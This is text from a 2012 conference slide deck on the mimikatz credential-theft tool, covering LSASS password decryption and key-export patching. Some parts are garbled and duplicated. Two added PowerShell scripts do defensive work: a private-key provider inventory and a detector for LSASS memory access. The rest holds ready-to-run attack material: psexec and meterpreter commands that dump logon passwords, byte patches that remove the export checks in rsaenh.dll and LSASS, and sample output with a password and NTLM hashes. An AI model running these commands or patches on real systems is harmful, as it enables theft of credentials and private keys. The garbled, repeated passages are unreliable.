bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
(Callouts: a constraint for most users; unavailable for computer keys)
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, … – cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported ( level)
[diagram: Process → CryptoAPI and RSA CSP. Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes → Exported Key; no → NTE_BAD_KEY_STATE. (PLAYSKOOL)]
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey
This function does all the work to prepare the export and checks whether the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
    Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider      : Microsoft Enhanced Cryptographic Provider v1.0
    Type          : AT_KEYEXCHANGE
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
    Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach cert (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable…, export
mimikatz :: crypto :: patchcapi :: limitations
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI… – It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)
[diagram: Process → CNG → RPC → KeyIso Service (LSASS process; NT6 System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP). Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes → Exported Key; no → NTE_NOT_SUPPORTED. (PLAYSKOOL)]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to ncrypt!SPCryptExportKey in lsass (keyiso)
This function does all the work to prepare the export and checks whether the key is exportable
mimikatz # crypto::exportKeys [user]
Clés CNG
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportabilité : NON
    Taille clé    : 2048
    Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO ; mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210 75 1C    jnz  short continue_key_export
.text:6C815210 EB 1C    jmp  short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable…, export again
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach cert (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach cert (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
  mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
  mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa, it will prevent access to accounts / the computer – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
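An added inventory check for the advice above (my code, not part of the talk or of mimikatz): it lists the private keys behind a store's certificates together with the provider that holds them. The "exportable" flag the talk patches away is only enforced by the software CSP (rsaenh.dll) or the software KSP in LSASS, so the column to act on is the provider class: the software provider names are the ones the talk lists, and treating other providers as "verify" is my own heuristic.

```powershell
# Added example, not mimikatz code. Inventory of private keys and their providers.
# "Exportable: NO" is a software check inside rsaenh.dll (CryptoAPI) or inside the
# software KSP hosted by LSASS (CNG); the talk shows a few patched bytes remove it.
# Only a smart card, TPM or HSM provider keeps the key out of reach of such a patch.

# Software providers named in the talk: patchable in-process (rsaenh.dll) or in LSASS (KSP).
$SoftwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-ProviderClass {
    param([string] $Provider)
    if (-not $Provider) { return 'unknown' }
    if ($SoftwareProviders -contains $Provider) { return 'software: export flag is patchable' }
    # Heuristic (my assumption, not from the talk): Microsoft smart card and TPM providers.
    if ($Provider -match 'Smart Card|Platform Crypto Provider') { return 'hardware-backed (smart card / TPM)' }
    return 'vendor provider: verify its CSP/KSP implementation'
}

function Get-PrivateKeyProtection {
    param([string] $StorePath = 'Cert:\CurrentUser\My')

    foreach ($cert in Get-ChildItem -Path $StorePath | Where-Object { $_.HasPrivateKey }) {
        # RSACryptoServiceProvider for CryptoAPI keys, RSACng for CNG keys (.NET 4.6+);
        # throws or returns $null when the key is missing or not RSA.
        try {
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
        } catch { $rsa = $null }

        $api = 'non-RSA or key not accessible'
        $provider = $null; $exportFlag = $null; $uiProtection = $null; $container = $null

        if ($rsa -is [System.Security.Cryptography.RSACng]) {
            $key          = $rsa.Key
            $api          = 'CNG (KeyIso service in LSASS)'
            $provider     = $key.Provider.Provider
            $exportFlag   = $key.ExportPolicy.HasFlag([System.Security.Cryptography.CngExportPolicies]::AllowPlaintextExport)
            $uiProtection = $key.UIPolicy.ProtectionLevel   # the password / popup protection from the slides
            $container    = $key.UniqueName
        } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
            $info         = $rsa.CspKeyContainerInfo
            $api          = 'CryptoAPI (CSP inside the calling process)'
            $provider     = $info.ProviderName
            $exportFlag   = $info.Exportable
            $uiProtection = $info.Protected
            $container    = $info.KeyContainerName
        }

        [pscustomobject]@{
            Subject      = $cert.Subject
            Thumbprint   = $cert.Thumbprint
            Api          = $api
            Provider     = $provider
            ExportFlag   = $exportFlag
            UiProtection = $uiProtection
            Class        = Get-ProviderClass $provider
            Container    = $container
        }
    }
}

# User store, then the machine store (computer keys cannot rely on password/popup protection).
Get-PrivateKeyProtection 'Cert:\CurrentUser\My'  | Format-Table Subject, Api, Provider, ExportFlag, UiProtection, Class -AutoSize
Get-PrivateKeyProtection 'Cert:\LocalMachine\My' | Format-Table Subject, Api, Provider, ExportFlag, UiProtection, Class -AutoSize
```

Any row classed "software" with a key that matters (code signing, TLS, EFS) is a candidate for migration to a smart card, TPM or HSM provider, whatever its ExportFlag says.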
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz
email     benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos "hu?"
Ok. It works…
But why?
Not at all logons on NT5 (may need an unlock)
From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on the client
  • No hash on the client
  – NTLM hash on the client…
  – the KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, to be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process to take benefit of its keys when we called it
Can it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
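Detection counterpart, added here and not part of the talk: both ways sekurlsa reaches the keys (a DLL injected into LSASS, or simply reading LSASS memory) need a handle to lsass.exe carrying specific access rights, which is what the "Audit" item on the sekurlsa "what we can do" slide can key on. This assumes Sysmon Event ID 10 (ProcessAccess) logging, a tool the talk does not mention; the sample records are constructed, and the allow-list is a placeholder.

```powershell
# Added example, not mimikatz code. Flags handles to lsass.exe whose granted access
# allows memory reading (enough to copy the LsaEncryptMemory keys and the encrypted
# logon secrets) or code injection (the older sekurlsa.dll way).
# Assumes Sysmon with Event ID 10 (ProcessAccess) enabled; sample data is constructed.

# Process access rights (winnt.h)
$PROCESS_CREATE_THREAD = 0x0002
$PROCESS_VM_OPERATION  = 0x0008
$PROCESS_VM_READ       = 0x0010
$PROCESS_VM_WRITE      = 0x0020

# Images that legitimately open lsass.exe with VM_READ on a given estate (AV/EDR, taskmgr,
# wmiprvse...). Placeholder entry: build this list from a baseline, not from here.
$KnownReaders = @('C:\Program Files\ExampleAV\avscan.exe')

function Get-LsassAccessVerdict {
    param(
        [Parameter(Mandatory)] [string] $SourceImage,
        [Parameter(Mandatory)] [string] $TargetImage,
        [Parameter(Mandatory)] [string] $GrantedAccess   # as Sysmon logs it, e.g. "0x1010"
    )
    if ((Split-Path -Leaf $TargetImage) -ne 'lsass.exe') { return $null }
    if ($KnownReaders -contains $SourceImage) { return $null }

    $mask = [Convert]::ToInt32($GrantedAccess, 16)
    $reasons = @()
    if ($mask -band $PROCESS_VM_READ) {
        $reasons += 'VM_READ: can copy LSASS memory (keys + encrypted logon secrets)'
    }
    if (($mask -band $PROCESS_VM_WRITE) -and ($mask -band $PROCESS_VM_OPERATION) -and ($mask -band $PROCESS_CREATE_THREAD)) {
        $reasons += 'VM_WRITE + VM_OPERATION + CREATE_THREAD: DLL injection capable'
    }
    if ($reasons.Count -eq 0) { return $null }

    [pscustomobject]@{
        Source        = $SourceImage
        GrantedAccess = $GrantedAccess
        Reason        = ($reasons -join '; ')
    }
}

# Live mode: pull recent Sysmon ProcessAccess events and run the verdict on each one.
function Get-LsassAccessAlerts {
    param([int] $MaxEvents = 1000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $fields = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
            Get-LsassAccessVerdict -SourceImage $fields.SourceImage -TargetImage $fields.TargetImage -GrantedAccess $fields.GrantedAccess
        } | Where-Object { $_ }
}

# Offline check on constructed records (not real log lines).
$sample = @(
    @{ SourceImage = 'C:\Windows\System32\svchost.exe'; TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1000' }    # QUERY_LIMITED_INFORMATION only: silent
    @{ SourceImage = 'C:\Users\kiwi\mimikatz.exe';      TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x1010' }    # VM_READ: memory reading
    @{ SourceImage = 'C:\Users\kiwi\inject.exe';        TargetImage = 'C:\Windows\System32\lsass.exe';   GrantedAccess = '0x143A' }    # full injection set
    @{ SourceImage = 'C:\Users\kiwi\mimikatz.exe';      TargetImage = 'C:\Windows\System32\notepad.exe'; GrantedAccess = '0x1FFFFF' }  # not lsass: ignored
)
$sample |
    ForEach-Object { Get-LsassAccessVerdict -SourceImage $_.SourceImage -TargetImage $_.TargetImage -GrantedAccess $_.GrantedAccess } |
    Where-Object { $_ } |
    Format-Table -AutoSize
```

On the sample, only the two lsass.exe records from the user profile are reported; the allow-list is what keeps this usable, since security products open lsass.exe with VM_READ all day.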
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx
[diagram: NT5 key material in lsass (lsasrv): g_pRandomKey → BYTE[g_cbRandomKey], g_cbRandomKey → DWORD (256), g_pDESXKey → BYTE[144], g_Feedback → BYTE[8]; copied… from the lsasrv loaded in lsass into the lsasrv loaded by mimikatz]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES
[diagram: NT6 key material in lsass (lsasrv): InitializationVector → BYTE[16]; h3DesKey and hAesKey → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA; copied… from the lsasrv loaded in lsass into mimikatz]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE  data; // etc.
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz :: sekurlsa :: what we can do
Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;)
– For privileged accounts, network login instead of interactive (when possible)
– Audit: pass the hash keeps traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $€
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
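A defender-side check for the list above, added here as an example and not part of the talk: it reads the registry settings that later Windows releases expose for several of these items (which SSPs LSASS loads, WDigest clear-text caching, LSA protection, NTLM restrictions, who holds the debug privilege) and reports what is still open. The value names are documented Microsoft settings; UseLogonCredential and RunAsPPL did not exist in 2012 (they came with Windows 8.1 and KB2871997), so on older hosts they read as absent. The thresholds and the wording of the findings are this example's own choices.

```powershell
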